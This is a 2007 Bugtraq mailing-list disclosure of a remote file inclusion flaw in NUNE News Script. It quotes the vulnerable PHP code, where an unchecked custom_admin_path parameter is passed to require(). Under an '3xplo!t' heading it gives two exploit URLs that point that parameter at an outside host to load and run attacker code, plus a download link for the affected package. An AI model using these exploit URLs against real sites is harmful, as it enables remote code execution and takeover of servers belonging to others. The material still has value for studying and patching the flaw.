NUNE News Script (custom_admin_path) Remote File Include Vulnerablity

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: NUNE News Script (custom_admin_path) Remote File Include Vulnerablity
From: xorontr@xxxxxxxxx
Date: 7 Jan 2007 11:36:59 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

-----------------------------------------------

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity

-----------------------------------------------

Author: xoron

-----------------------------------------------

Code:

if (isset($custom_admin_path))
    $special_admin_path = $custom_admin_path;

else
    $special_admin_path = "news/admin";

require("$special_admin_path/config/nune.conf.php");

-----------------------------------------------

3xplo!t:

www.target.com/[script]/index.php?custom_admin_path=http://evilscript?
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript?

-----------------------------------------------

download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz

-----------------------------------------------

Greetz: str0ke, kacper, GODAttach

nukedx'e elveda, kendine iyi bak dostum..!

-----------------------------------------------

# milw0rm.com [2007-01-06]

Prev by Date: Uguestbook Remote Password Disclosure Vulnerability
Next by Date: [SECURITY] [DSA 1245-1] New proftpd packages fix denial of service
Previous by thread: Uguestbook Remote Password Disclosure Vulnerability
Next by thread: [SECURITY] [DSA 1245-1] New proftpd packages fix denial of service
Index(es):
- Date
- Thread